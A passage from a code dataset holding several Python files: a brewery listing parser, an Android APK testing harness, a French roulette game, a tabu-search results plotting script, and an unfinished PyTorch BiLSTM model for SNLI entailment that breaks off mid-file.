line.replace('Phone:','').strip()\n elif state == 4:\n brewer['type'] = line.replace('Type:','').strip()\n elif state == 5:\n brewer['web'] = line.strip()\n\n\n return brewerList\n\nif __name__ == '__main__':\n import sys\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--filename', required=True)\n parser.add_argument('-o', '--outcsvfile', required=True)\n args = parser.parse_args()\n\n brewers = parse(args.filename)\n hdr = ['name','address','city-state','phone','type','web']\n with open(args.outcsvfile, 'wb') as f: # Just use 'w' mode in 3.x\n w = csv.writer(f)\n w.writerow(hdr)\n for row in brewers:\n w.writerow([row['name'],row['address'],row['city-state'],row['phone'],row['type'],row['web']])\n\n\n\n","sub_path":"data/parseBreweries.py","file_name":"parseBreweries.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"471957475","text":"import logging.config\n\nimport sys\nimport yaml\n\nfrom modules import agent\nfrom modules import apps\nfrom modules import config\nfrom modules.done_list_handler import list_handler, Status\nfrom modules.entities import Apk\nfrom modules.exceptions import AbsentActivityException, ManifestNotFoundException, UserExitException, ErrorInstallingException, ErrorUninstallingException, NotEnoughSpaceException\nfrom modules.tester import Tester\n\n\ndef setup_logging():\n with open('logging.yaml') as f:\n logging.config.dictConfig(yaml.safe_load(f.read()))\n\n\ndef main():\n logging.info(\"START EXPERIMENT\")\n apps_to_process, done_project_count, overall_apps = apps.get_apps_to_process(config.APK_REPOSITORY)\n counter = done_project_count\n fail_counter = list_handler.get_fail_counter()\n for app_name in apps_to_process:\n logging.info('================================================================================================================================================')\n apk = Apk(app_name)\n tester = Tester(apk)\n try:\n counter += 1\n logging.info(f'{app_name}: {counter} OF {overall_apps}, FAIL TO RUN: {fail_counter}')\n tester.test()\n except ErrorInstallingException:\n fail_counter += 1\n logging.exception(f'Cannot install app {app_name}')\n list_handler.write(app_name, Status.FAIL, reason='INSTALLATION ERROR')\n except NotEnoughSpaceException:\n logging.exception(f'Cannot install app {app_name} because there is not enough space. Stopping tool. Please, wipe data, then run tool again')\n sys.exit()\n except AbsentActivityException:\n fail_counter += 1\n logging.exception(f'Absent main activity for app {app_name}')\n tester.uninstall()\n list_handler.write(app_name, Status.FAIL, reason='ABSENT ACTIVITY')\n except ManifestNotFoundException:\n fail_counter += 1\n logging.error(f'Manifest not found for app {app_name}')\n list_handler.write(app_name, Status.FAIL, reason='MANIFEST NOT FOUND')\n tester.uninstall()\n except UserExitException:\n logging.info(f'User has chosen to exit while testing {app_name}')\n list_handler.write(app_name, Status.UNDEFINED, reason='USER_EXIT')\n tester.uninstall()\n sys.exit()\n except ErrorUninstallingException:\n logging.exception(f'Cannot uninstall {app_name}')\n list_handler.write(app_name, Status.SUCCESS, comment='UNINSTALL ERROR')\n except BaseException:\n fail_counter += 1\n logging.exception(f'Exception for app {app_name}')\n tester.uninstall()\n list_handler.write(app_name, Status.FAIL, reason='UNKNOWN')\n agent.close_crash_report()\n list_handler.close()\n\n\nif __name__ == \"__main__\":\n setup_logging()\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"551267085","text":"import math\nimport random\nimport time\n\ndef choixDuNumero():\n#Cette fonction va permettre au joueur de choisir son numéro\n numeroJoueur = input(\"Veuillez entrer un numéro compris en 0 et 50\\n\")\n\n try:\n numeroJoueur = int(numeroJoueur)\n if numeroJoueur < 0 or numeroJoueur >= 50:\n print(\"Le nombre saisie n'est pas compris entre 0 et 50\\n\")\n return choixDuNumero()\n return numeroJoueur\n except ValueError:\n print(\"Ce que vous avez saisie n'est pas un nombre\\n\")\n return choixDuNumero()\n\ndef choixMise(miseInitiale):\n#Cette fonction va permettre au joueur de choisir sa mise\n print(\"Votre cagnotte actuelle s'élève à {}\\n\".format(miseInitiale))\n\n mise = input(\"Veuillez choisir votre mise\")\n\n try:\n mise = int(mise)\n if mise < 0:\n print(\"Votre mise doit être supérieure à 0\")\n return choixMise(miseInitiale)\n elif mise > miseInitiale:\n print(\"Vous n'avez pas assez d'argent pour faire cela\")\n return choixMise(miseInitiale)\n return mise\n except ValueError:\n print(\"Ce que vous avez saisie n'est pas un nombre\")\n return choixMise(miseInitiale)\n\n\ndef billeAleatoire():\n#Fonction qui va permettre au casino de choisir aléatoirement un numéro entre 0 et 49\n\n print(\"Attention Faites vos JEUX !!!\\n\")\n time.sleep(2)\n numeroAleatoire = random.randrange(50)\n return numeroAleatoire\n\ndef couleurDesBilles(numero):\n#Fonction qui va déterminer la couleur des billes\n\n if numero % 2 == 0:\n couleurBille = \"noire\"\n else:\n couleurBille = \"rouge\"\n return couleurBille\n\ndef gainDuJoueur(mise, numeroJoueur, numeroAleatoire):\n#Fonction qui va déterminer le gain des joueurs et retourner le gain\n\n if numeroJoueur == numeroAleatoire:\n print(\"Vous avez trouvé le bon numéro\\n\")\n gain = mise + 3 * mise\n print(\"Vous gagnez {}$ \\n\".format(gain - mise))\n elif numeroJoueur != numeroAleatoire and couleurDesBilles(numeroJoueur) == couleurDesBilles(numeroAleatoire):\n print(\"Vous n'avez pas trouvé le bon numéro mais la couleur est correcte\\n\")\n gain = mise + 0.5 * mise\n print(\"Vous gagnez {}$ \\n\".format(gain - mise))\n else:\n print(\"Dommage, vous avez perdu\\n\")\n gain = 0\n print(\"Vous perdez votre mise\\n\")\n return math.ceil(gain)\n\n","sub_path":"ZCasino/Fonctions.py","file_name":"Fonctions.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"242175209","text":"#!/usr/bin/env python\n# encoding=utf8 \nimport sys \n\nreload(sys) \nsys.setdefaultencoding('utf8')\n\nimport matplotlib.pyplot as plt\n\ndef graf1(entrada, salidas, modo = \"Tam\", exp = \"1\"):\n fig, ax = plt.subplots()\n with open(entrada, \"r\") as f:\n lineas = f.readlines()\n listaTam = map(lambda x : int(x), lineas[0].split())\n listaN = lineas[1].split()\n lineas = map(lambda l : l.split(), lineas)\n listaCalidad = [[ int(lineas[2 * x][y]) for x in range(1, len(listaTam) + 1)] for y in range(len(listaN))]\n listaTiempos = [[ float(lineas[2 * x + 1][y]) for x in range(1, len(listaTam) + 1)] for y in range(len(listaN))]\n for i in range(len(listaCalidad)):\n minC = min(listaCalidad[i])\n listaCalidad[i] = map(lambda x : x - minC, listaCalidad[i])\n if (exp != \"3\"):\n for i in range(len(listaTiempos)):\n minT = min(listaTiempos[i])\n listaTiempos[i] = map(lambda x : x - minT, listaTiempos[i])\n\n fig, ax = plt.subplots()\n width = 3.5 / len(listaTiempos)\n colors = [\"DarkGreen\", \"SaddleBrown\", \"Purple\"]\n if (len(listaCalidad) > 1):\n ax.bar([val - width * 1.5 for val in listaTam], [val for val in listaCalidad[0]], width, color = colors[0])\n ax.bar([val - width * 0.5 for val in listaTam], [val for val in listaCalidad[1]], width, color = colors[1])\n else:\n ax.bar([val - width * 0.5 for val in listaTam], [val for val in listaCalidad[0]], width, color = colors[0])\n if (len(listaCalidad) > 2):\n ax.bar([val + width * 0.5 for val in listaTam], [val for val in listaCalidad[2]], width, color = colors[2])\n ax.set_xticklabels(map(lambda x: str(x), listaTam), minor = True)\n \n ax.set_ylabel(\"#E\")\n ax.margins(0.05)\n ax.set_xlim([min(listaTam) * 0.95, max(listaTam) * 1.05])\n ax.set_ylim([0, max([max(l) for l in listaCalidad]) * 1.3])\n if (modo == \"Tam\"):\n ax.set_xlabel(unicode(\"Tamaño de la lista Tabú\"))\n elif (modo == \"ItMax\"):\n ax.set_xlabel(unicode(\"Cantidad de iteraciones máximas\"))\n elif (modo == \"ItSMej\"):\n ax.set_xlabel(unicode(\"Cantidad de iteraciones máximas sin mejorar\"))\n if (len(listaN) > 1):\n ax.legend([\"N₁ = \" + str(l) for l in listaN], loc = 2)\n fig.savefig(salidas[0])\n\n plt.cla()\n\n fig2, ax2 = plt.subplots()\n width = 3.5 / len(listaTiempos)\n colors = [\"DarkGreen\", \"SaddleBrown\", \"Purple\"]\n if (len(listaTiempos) > 1):\n ax2.bar([val - width * 1.5 for val in listaTam], [val for val in listaTiempos[0]], width, color = colors[0])\n ax2.bar([val - width * 0.5 for val in listaTam], [val for val in listaTiempos[1]], width, color = colors[1])\n else:\n ax2.bar([val - width * 0.5 for val in listaTam], [val for val in listaTiempos[0]], width, color = colors[0])\n if (len(listaTiempos) > 2):\n ax2.bar([val + width * 0.5 for val in listaTam], [val for val in listaTiempos[2]], width, color = colors[2])\n ax2.set_xticklabels(map(lambda x: str(x), listaTam), minor = True)\n \n ax2.set_ylabel(\"Tiempo [s]\")\n ax2.margins(0.05)\n ax2.set_xlim([min(listaTam) * 0.95, max(listaTam) * 1.05])\n ax2.set_ylim([0, max([max(l) for l in listaTiempos]) * 1.3])\n if (modo == \"Tam\"):\n ax2.set_xlabel(unicode(\"Tamaño de la lista Tabú\"))\n elif (modo == \"ItMax\"):\n ax2.set_xlabel(unicode(\"Cantidad de iteraciones máximas\"))\n elif (modo == \"ItSMej\"):\n ax2.set_xlabel(unicode(\"Cantidad de iteraciones máximas sin mejorar\"))\n if (len(listaN) > 1):\n ax2.legend([\"N₁ = \" + str(l) for l in listaN], loc = 2)\n fig2.savefig(salidas[1])\n\n#graf1(\"exp13.out\", [\"exp13Cal.png\", \"exp13Tiempos.png\"], \"ItMax\")\n#graf1(\"exp14.out\", [\"exp14Cal.png\", \"exp14Tiempos.png\"], \"ItMax\")\n#graf1(\"exp18.out\", [\"exp18bCal.png\", \"exp18bTiempos.png\"], \"Tam\", \"3\")\n","sub_path":"TabuC++/graficar.py","file_name":"graficar.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"357427805","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport random as r\n\nfrom torchnlp.word_to_vector import GloVe\nimport json\n\nimport sys\n\nFOLDER_PATH =None\nDEBUG = True\ndef DEBUG_PRINT(x):\n if DEBUG:\n print(x)\n\n\nGLOVE_DATA = GloVe(name='6B', dim=100)\n\ndef list2dict(lst):\n it = iter(lst)\n indexes = range(len(lst))\n res_dct = dict(zip(it, indexes))\n return res_dct\n\ndef reverseDict(d):\n vals = ['']*len(d.keys())\n for k in d.keys():\n vals[d[k]] = k\n return vals\n\n''' Seems like gloves works on words! not indexes!!!! '''\n\nclass As3Dataset(Dataset):\n def __init__(self, file_path, is_test_data=False, is_train_data=True): \n \n self.file_path = file_path\n \n dataset = []\n sample_w = []\n sample_t = []\n word_list = []\n tag_list = []\n \n with open(file_path, \"r\") as df:\n for line in df:\n line = line.strip()\n line = json.loads(line)\n if (line['gold_label'] == 'entailment') or (line['gold_label'] == 'contradiction') or (line['gold_label'] == 'neutral'): \n dataset.append({\n 'premise': line['sentence1'].split(),\n 'hypothesis':line['sentence2'].split(),\n 'label':line['gold_label']\n })\n \n #self.word_set = set(word_list)\n #self.tag_set = set(tag_list)\n self.dataset = dataset\n self.is_test_data = is_test_data\n self.is_train_data = is_train_data\n\n def __len__(self):\n return len(self.dataset)\n\n def setTranslators(self, wT, lT):\n self.wT = wT\n self.lT = lT\n\n def toIndexes(self, wT, lT):\n self.dataset = [{'premise':wT.translate(data['premise']), 'hypothesis':wT.translate(data['hypothesis']), 'label':lT.translate(data['label'])} for data in self.dataset]\n #self.dataset = [(wT.translate(data[0], self.is_train_data), lT.translate(data[1]) if self.is_test_data==False else None, data[2]) for data in self.dataset]\n\n def __getitem__(self, index):\n data = self.dataset[index]\n return {'premise': self.wT.translate(data['premise']), 'hypothesis': self.wT.translate(data['hypothesis']), 'label': self.lT.translate(data['label'])}\n #return self.dataset[index]\n\nclass WTranslator(object):\n def __init__(self, init=True):\n if init:\n self.wdict = GLOVE_DATA.token_to_index\n unknown_idx = len(GLOVE_DATA)\n self.wdict.update({\"UNKNOWN\":unknown_idx})\n self.wpadding_idx = unknown_idx + 1\n \n #wordset.update([\"UNKNOWN\"])\n cset = list(\" abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,;.!?:'\\\"/\\\\|_@#$%^&*~`+-=<>()[]{}\")\n cset.append(\"UNKNOWN\")\n self.cdict = list2dict(cset)\n self.cpadding_idx = len(self.cdict)\n\n def getPaddingIndex(self):\n return {'w':self.wpadding_idx, 'c':self.cpadding_idx}\n\n def saveParams(self):\n return {'cdict':self.cdict, 'wdict':self.wdict}\n\n def loadParams(self, params):\n self.cdict = params['cdict']\n self.wdict = params['wdict']\n\n def _dictHandleExp(self, dic, val):\n try: \n return dic[val]\n except KeyError:\n return dic['UNKNOWN']\n \n def _translate1(self, word_list):\n # Note that GLOVE is using only lower case words, hence we need to lower case the words\n return [self._dictHandleExp(self.wdict, word.lower()) for word in word_list]\n\n def _translate2(self, word_list):\n letter_trans = [np.array([self._dictHandleExp(self.cdict, l) for l in word]) for word in word_list]\n lengths = [len(word) for word in word_list]\n return [letter_trans, lengths]\n\n def translate(self, word_list):\n first = np.array(self._translate1(word_list))\n second = self._translate2(word_list)\n return {'word': first, 'chars': second}\n\n def getLengths(self):\n return {'word' : len(self.wdict), 'c' : len(self.cdict)}\n\nclass TagTranslator(object):\n def __init__(self, init=True):\n if init:\n tagset = ['entailment', 'contradiction', 'neutral'] \n self.tag_dict = list2dict(tagset)\n\n def translate(self, tag):\n return self.tag_dict[tag]\n \n def getLengths(self):\n return {'tag': len(self.tag_dict)}\n\n def getPaddingIdx(self):\n return {'tag': len(self.tag_dict)}\n\n def saveParams(self):\n return {'tag':self.tag_dict}\n\n def loadParams(self, params):\n self.tag_dict = params['tag']\n\n\nclass MyEmbedding(nn.Module):\n def __init__(self, embedding_dim, translator, c_embedding_dim):\n super(MyEmbedding, self).__init__()\n padding_idx = translator.getPaddingIndex()['w']\n num_embedding = translator.getLengths()['word']\n #self.wembeddings = nn.Embedding(num_embeddings = num_embedding + 1, embedding_dim = embedding_dim, padding_idx = padding_idx)\n vecs = GLOVE_DATA.vectors\n pad = torch.zeros((2,vecs[0].shape[0]))\n vecs = torch.cat((vecs, pad), 0)\n self.wembeddings = nn.Embedding.from_pretrained(embeddings = vecs, freeze=False,\n padding_idx = padding_idx) \n\n padding_idx = translator.getPaddingIndex()['c']\n num_embedding = translator.getLengths()['c']\n self.cembeddings = nn.Embedding(num_embeddings = num_embedding + 1, embedding_dim = c_embedding_dim, padding_idx = padding_idx)\n \n def forward(self, data):\n word_embeds = self.wembeddings(torch.tensor(data[0]).long())\n char_embeds = self.cembeddings(torch.tensor(data[1]).long())\n return (word_embeds, char_embeds)\n\nclass Padding(object):\n def __init__(self, wT, lT):\n self.wT = wT\n self.lT = lT\n \n self.wPadIndex = self.wT.getPaddingIndex()['w']\n self.cPadIndex = self.wT.getPaddingIndex()['c']\n \n def padData(self, data_b, len_b, max_l, padIndex):\n batch_size = len(len_b)\n padded_data = np.ones((batch_size, max_l))*padIndex\n for i, data in enumerate(data_b):\n padded_data[i][:len_b[i]] = data #first embeddings\n return padded_data\n\n def padTag(self, tag_b, len_b, max_l, padIndex):\n batch_size = len(len_b)\n padded_tag = np.ones((batch_size, max_l))*padIndex\n for i,tag in enumerate(tag_b):\n padded_tag[i][:len_b[i]] = np.array(tag)\n return padded_tag\n \n def padList(self, data_b, lens_b, max_l):\n # Expect data_b shape = , , [, 1]\n # returns: , , \n\n w_max_l = 0\n for batch in data_b:\n sentence, word_len = batch\n m = max(word_len)\n if m > w_max_l:\n w_max_l = m\n\n batch_size = len(lens_b)\n padded_words = np.ones((batch_size, max_l, w_max_l))*self.cPadIndex\n padded_lens = np.ones((batch_size, max_l))\n for i, batch in enumerate(data_b):\n sentence, words_len = batch\n for j, word in enumerate(sentence):\n word_len = words_len[j]\n padded_words[i][j][:word_len] = word\n padded_lens[i][j] = word_len\n \n return padded_words, padded_lens\n\n def collate_fn(self, data):\n #data.sort(key=lambda x: x[2], reverse=True)\n\n tag_b = [d['label'] for d in data]\n \n premise_w_lens = [len(d['premise']['word']) for d in data]\n data_premise = [d['premise']['word'] for d in data]\n padded_premise_w = self.padData(data_premise, premise_w_lens, max(premise_w_lens), self.wPadIndex)\n \n hyp_w_lens = [len(d['hypothesis']['word']) for d in data]\n data_hyp = [d['hypothesis']['word'] for d in data]\n padded_hyp_w = self.padData(data_hyp, hyp_w_lens, max(hyp_w_lens), self.wPadIndex)\n\n data_premise = [d['premise']['chars'] for d in data]\n padded_premise_c, padded_premise_sublens = self.padList(data_premise, premise_w_lens, max(premise_w_lens))\n\n data_hyp = [d['hypothesis']['chars'] for d in data]\n padded_hyp_c, padded_hyp_sublens = self.padList(data_hyp, hyp_w_lens, max(hyp_w_lens))\n\n premise_data = {'w_data': padded_premise_w, 'w_lens': premise_w_lens, 'c_data': padded_premise_c, 'c_lens': padded_premise_sublens}\n hyp_data = {'w_data': padded_hyp_w, 'w_lens': hyp_w_lens, 'c_data': padded_hyp_c, 'c_lens': padded_hyp_sublens}\n return premise_data, hyp_data, tag_b\n\n \n\nclass BiLSTM(nn.Module):\n def __init__(self, embedding_dim, hidden_rnn_dim, tagset_size,\n translator, c_embedding_dim, filters_dim = 100, filters = [1,3,5], dropout=False, add_tanh=False,\n num_lstm_layers = 3):\n super(BiLSTM, self).__init__()\n self.c_embeds_dim = c_embedding_dim\n self.embedding_dim = embedding_dim\n # Embedding layers\n padding_idx = translator.getPaddingIndex()['w']\n num_embedding = translator.getLengths()['word']\n vecs = GLOVE_DATA.vectors\n pad = torch.zeros((2,vecs[0].shape[0]))\n vecs = torch.cat((vecs, pad), 0)\n self.wembeddings = nn.Embedding.from_pretrained(embeddings = vecs, freeze=False,\n padding_idx = padding_idx) \n\n padding_idx = translator.getPaddingIndex()['c']\n num_embedding = translator.getLengths()['c']\n self.cembeddings = nn.Embedding(num_embeddings = num_embedding + 1, embedding_dim = c_embedding_dim, padding_idx = padding_idx)\n\n self.dropout_0 = nn.Dropout() \n #self.lstmc = nn.LSTM(input_size = c_embedding_dim, hidden_size = embedding_dim,\n # batch_first = True)\n self.conv_list = []\n for kernel in filters:\n self.conv_list.append(nn.Conv2d(c_embedding_dim, filters_dim, kernel))\n self.lstm_list = []\n for i in range(num_lstm_layers):\n self.lstm_list.append(nn.LSTM(input_size = embedding_dim*(len(filters) + 1), hidden_size = hidden_rnn_dim,\n bidirectional=True, num_layers=1, batch_first=True))\n '''\n To be replaced \n self.linear1 = nn.Linear(hidden_rnn_dim*2, tagset_size)\n self.dropout_1 = nn.Dropout() \n self.lineare = nn.Linear(embedding_dim*2, embedding_dim)\n self.dropout_e = nn.Dropout()\n self.dropout = dropout\n self.add_tanh = add_tanh\n '''\n\n def conv(self, e_batch):\n for conv_layer in self.conv_list:\n c = conv_layer(e_batch)\n c = nn.functional.relu(c)\n c = torch.max(c,2)\n return c\n\n def forward(self, sample):\n premise_data, hyp_data, tag_b = sample\n\n padded_premise_w = premise_data['w_data']\n premise_w_lens = premise_data['w_lens']\n padded_premise_c = premise_data['c_data']\n\n padded_hyp_w = hyp_data['w_data']\n hyp_w_lens = hyp_data['w_lens']\n padded_hyp_c = hyp_data['c_data']\n\n batch_size = len(padded_premise_w)\n\n prem_w_e = self.wembeddings(torch.tensor(padded_premise_w).long())\n hyp_w_e = self.wembeddings(torch.tensor(padded_hyp_w).long())\n prem_c_e = self.cembeddings(torch.tensor(padded_premise_c).long())\n hyp_c_e = self.cembeddings(torch.tensor(padded_hyp_c).long())\n \n print(prem_c_e.shape)\n ''' Currently it's NumWordsXMaxNumCharsXEmbeddingSize -> need to rehsape into \n EmbeddingsSizeXNumWordsXMaxNumChars because the embedding size is the channels '''\n prem_c_conv = self.conv(prem_c_e)\n print(prem_c_conv) \n #embeds_list = self.embeddings.forward(data_list)\n \n embeds_word = embeds_list[0]\n embeds_char = embeds_list[1]\n char_data_list = data_list[1]\n\n #lstm_embeds_word = self.runLSTMc(char_data_list, embeds_char, padded_sublens) \n\n e_joined = torch.cat((embeds_word, lstm_embeds_word), dim=2)\n flatten = e_joined.reshape(-1, e_joined.shape[2])\n if self.dropout:\n e_joined = self.dropout_e(e_joined)\n le_out = self.lineare(e_joined)\n if self.add_tanh:\n le_out = torch.tanh(le_out)\n embeds_out = le_out.reshape(batch_size, e_joined.shape[1], self.embedding_dim)\n \n if self.dropout:\n embeds_out = self.dropout_0(embeds_out)\n\n packed_embeds = torch.nn.utils.rnn.pack_padded_sequence(embeds_out, len_list, batch_first=True)\n lstm_out, _ = self.lstm(packed_embeds)\n unpacked_lstm_out, _ = torch.nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first = True)\n\n flatten = unpacked_lstm_out.reshape(-1, unpacked_lstm_out.shape[2])\n if self.dropout:\n flatten = self.dropout_1(flatten)\n o_ln1 = self.linear1(flatten)\n shaped = o_ln1.reshape(batch_size, unpacked_lstm_out.shape[1], o_ln1.shape[1])\n return shaped\n\n def getLabel(self, data):\n _, prediction_argmax = torch.max(data, 1)\n return prediction_argmax\n\n\nclass Run(object):\n def __init__(self, params):\n self.edim = params['EMBEDDING_DIM']\n self.rnn_h_dim = params['RNN_H_DIM']\n self.num_epochs = params['EPOCHS']\n self.batch_size = params['BATCH_SIZE']\n self.c_embedding_dim = params['CHAR_EMBEDDING_DIM']\n self.train_file = params['TRAIN_FILE']\n self.dev_file = params['DEV_FILE']\n self.test_file = params['TEST_FILE']\n self.test_o_file = params['TEST_O_FILE']\n self.model_file = params['MODEL_FILE']\n self.save_to_file = params['SAVE_TO_FILE']\n self.run_dev = params['RUN_DEV']\n self.learning_rate = params['LEARNING_RATE']\n self.dropout = params['DROPOUT']\n self.acc_data_list = []\n\n def _save_model_params(self, tagger, wT, lT):\n try:\n params = torch.load(self.model_file)\n except FileNotFoundError:\n print(\"No model params file found - creating new model params\")\n params = {}\n\n flavor_params = {}\n flavor_params.update({'tagger' : tagger.state_dict()})\n flavor_params.update({'wT' : wT.saveParams()})\n flavor_params.update({'lT' : lT.saveParams()})\n params.update({'ModelParams' : flavor_params})\n torch.save(params, self.model_file)\n\n def _load_translators_params(self, wT, lT):\n params = torch.load(self.model_file)\n flavor_params = params['ModelParams']\n wT.loadParams(flavor_params['wT'])\n lT.loadParams(flavor_params['lT'])\n\n def _load_bilstm_params(self, tagger):\n params = torch.load(self.model_file)\n flavor_params = params[str('ModelParams')]\n tagger.load_state_dict(flavor_params['tagger'])\n\n def _calc_batch_acc(self, tagger, flatten_tag, flatten_label): \n predicted_tags = tagger.getLabel(flatten_tag)\n diff = predicted_tags - flatten_label\n no_diff = (diff == 0)\n padding_mask = (flatten_label == self.lTran.getLengths()['tag'])\n if self.ignore_Os:\n Os_mask = (flatten_label == self.lTran.tag_dict['O'])\n no_diff_and_padding_label = no_diff*(padding_mask + Os_mask)\n no_diff_and_padding_label = (no_diff_and_padding_label > 0)\n else:\n no_diff_and_padding_label = no_diff*padding_mask\n\n to_ignore = len(no_diff_and_padding_label[no_diff_and_padding_label == True])\n tmp = len(diff[diff == 0]) - to_ignore\n if tmp < 0:\n raise Exception(\"non valid tmp value\")\n correct_cntr = tmp \n total_cntr = len(predicted_tags) - to_ignore\n return correct_cntr, total_cntr\n\n def _flat_vecs(self, batch_tag_score, batch_label_list):\n flatten_tag = batch_tag_score.reshape(-1, batch_tag_score.shape[2])\n flatten_label = torch.LongTensor(batch_label_list.reshape(-1))\n return flatten_tag, flatten_label\n\n def runOnDev(self, tagger, padder):\n tagger.eval()\n dev_dataset = As3Dataset(self.dev_file, False, False)\n #dev_dataset.toIndexes(wT = self.wTran, lT = self.lTran)\n dev_dataset.setTranslators(wT = self.wTran, lT = self.lTran)\n dev_dataloader = DataLoader(dataset=dev_dataset,\n batch_size=self.batch_size, shuffle=False,\n collate_fn = padder.collate_fn)\n with torch.no_grad():\n correct_cntr = 0\n total_cntr = 0\n for sample in dev_dataloader:\n batch_data_list, batch_label_list, batch_len_list, padded_sublens = sample\n\n batch_tag_score = tagger.forward(batch_data_list, batch_len_list, padded_sublens)\n \n flatten_tag, flatten_label = self._flat_vecs(batch_tag_score, batch_label_list)\n\n #calc accuracy\n c, t = self._calc_batch_acc(tagger, flatten_tag, flatten_label)\n correct_cntr += c \n total_cntr += t\n \n acc = correct_cntr/total_cntr\n self.acc_data_list.append(acc)\n print(\"Validation accuracy \" + str(acc))\n \n tagger.train()\n\n\n def _saveAccData(self):\n try:\n acc_data = torch.load('accuracy_graphs_data')\n except FileNotFoundError:\n print(\"No accuracy data file found - creating new\")\n acc_data = {}\n\n acc_data.update({str('ModelParams'): self.acc_data_list})\n torch.save(acc_data, 'accuracy_graphs_data')\n\n def test(self):\n test_dataset = As3Dataset(file_path = self.test_file, \n is_test_data = True, is_train_data = False)\n\n self.wTran = WTranslator(None, None, None, None, False)\n self.lTran = TagTranslator(None, False)\n\n self._load_translators_params(self.wTran, self.lTran)\n #test_dataset.toIndexes(wT = self.wTran, lT = self.lTran)\n test_dataset.setTranslators(wT = self.wTran, lT = self.lTran)\n\n tagger = BiLSTM(embedding_dim = self.edim, hidden_rnn_dim = self.rnn_h_dim,\n translator=self.wTran, tagset_size = self.lTran.getLengths()['tag'] + 1,\n c_embedding_dim = self.c_embedding_dim, dropout = self.dropout)\n\n self._load_bilstm_params(tagger)\n padder = Padding(self.wTran, self.lTran)\n \n test_dataloader = DataLoader(dataset=test_dataset,\n batch_size=1, shuffle=False,\n collate_fn = padder.collate_fn)\n\n reversed_dict = reverseDict(self.lTran.tag_dict)\n reversed_dict.append('UNKNOWN')\n with torch.no_grad():\n with open(self.test_o_file, 'w') as wf:\n for sample in test_dataloader:\n batch_data_list, batch_label_list, batch_len_list, padded_sublens = sample\n batch_tag_score = tagger.forward(batch_data_list,\n batch_len_list, padded_sublens)\n for i, sample_tag_list in enumerate(batch_tag_score):\n predicted_tags = tagger.getLabel(sample_tag_list)\n for j in range(batch_len_list[i]):\n t = predicted_tags[j]\n w = reversed_dict[t]\n wf.write(str(w) + \"\\n\")\n wf.write(\"\\n\")\n\n def train(self):\n print(\"Loading data\")\n train_dataset = As3Dataset(self.train_file, is_test_data=False, is_train_data=True)\n print(\"Done loading data\")\n\n self.wTran = WTranslator()\n self.lTran = TagTranslator()\n\n print(\"translate to indexes\")\n #train_dataset.toIndexes(wT = self.wTran, lT = self.lTran)\n train_dataset.setTranslators(wT = self.wTran, lT = self.lTran)\n print(\"done\")\n\n print(\"init tagger\")\n tagger = BiLSTM(embedding_dim = self.edim, hidden_rnn_dim = self.rnn_h_dim,\n translator=self.wTran, tagset_size = self.lTran.getLengths()['tag'] + 1,\n c_embedding_dim = self.c_embedding_dim, dropout = self.dropout)\n print(\"done\")\n\n print(\"define loss and optimizer\")\n loss_function = nn.CrossEntropyLoss() #ignore_index=len(lTran.tag_dict))\n optimizer = torch.optim.Adam(tagger.parameters(), lr=self.learning_rate) #0.01)\n print(\"done\")\n\n print(\"init padder\")\n padder = Padding(self.wTran, self.lTran)\n print(\"done\")\n\n train_dataloader = DataLoader(dataset=train_dataset,\n batch_size=self.batch_size, shuffle=True,\n collate_fn = padder.collate_fn)\n \n print(\"Starting training\")\n print(\"data length = \" + str(len(train_dataset)))\n \n if self.run_dev:\n self.runOnDev(tagger, padder) \n for epoch in range(self.num_epochs):\n loss_acc = 0\n progress1 = 0\n progress2 = 0\n correct_cntr = 0\n total_cntr = 0\n sentences_seen = 0\n for sample in train_dataloader:\n if progress1/1000 == progress2:\n print(\"reached \" + str(progress2*1000))\n progress2+=1\n progress1 += self.batch_size\n sentences_seen += self.batch_size\n\n tagger.zero_grad()\n #batch_data_list, batch_label_list, batch_len_list, padded_sublens = sample\n \n batch_tag_score = tagger.forward(sample)\n \n flatten_tag, flatten_label = self._flat_vecs(batch_tag_score, batch_label_list)\n\n #calc accuracy\n c, t = self._calc_batch_acc(tagger, flatten_tag, flatten_label)\n correct_cntr += c \n total_cntr += t\n\n loss = loss_function(flatten_tag, flatten_label)\n loss_acc += loss.item()\n loss.backward()\n optimizer.step()\n\n if sentences_seen >= 500:\n sentences_seen = 0\n if self.run_dev:\n self.runOnDev(tagger, padder) \n \n print(\"epoch: \" + str(epoch) + \" \" + str(loss_acc))\n print(\"Train accuracy \" + str(correct_cntr/total_cntr))\n \n if self.save_to_file:\n self._save_model_params(tagger, self.wTran, self.lTran)\n\n if self.run_dev:\n self._saveAccData()\n #if (sys.argv[1] == 'save') or (sys.argv[1] == 'loadsave'):\n #self._save_model_params(tagger, self.wTran, self.lTran)\n #torch.save(tagger.state_dict(), 'bilstm_params.pt')\n\n\nFAVORITE_RUN_PARAMS = { \n 'EMBEDDING_DIM' : 50, \n 'RNN_H_DIM' : 50, \n 'EPOCHS' : 20, \n 'BATCH_SIZE' : 2,\n 'CHAR_EMBEDDING_DIM': 15,\n 'LEARNING_RATE' : 0.01\n }\n\nif __name__ == \"__main__\": \n train_file = \"./data/snli_1.0/small_dataset.jsonl\"\n #\"sys.argv[1]\n model_file = 'SOMEMODEL' #sys.argv[2]\n epochs = 1 #int(sys.argv[3])\n run_dev = 'n' #sys.argv[4]\n if run_dev == 'y':\n run_dev = True\n dev_file = sys.argv[5]\n else:\n run_dev = False\n dev_file = None\n \n RUN_PARAMS = FAVORITE_RUN_PARAMS\n RUN_PARAMS.update({ \n 'TRAIN_FILE': train_file,\n 'DEV_FILE' : dev_file,\n 'TEST_FILE': None, #test_file,\n 'TEST_O_FILE': None, #test_o_file,\n 'MODEL_FILE': model_file,\n 'SAVE_TO_FILE': False, \n 'RUN_DEV' : run_dev,\n 'EPOCHS' : 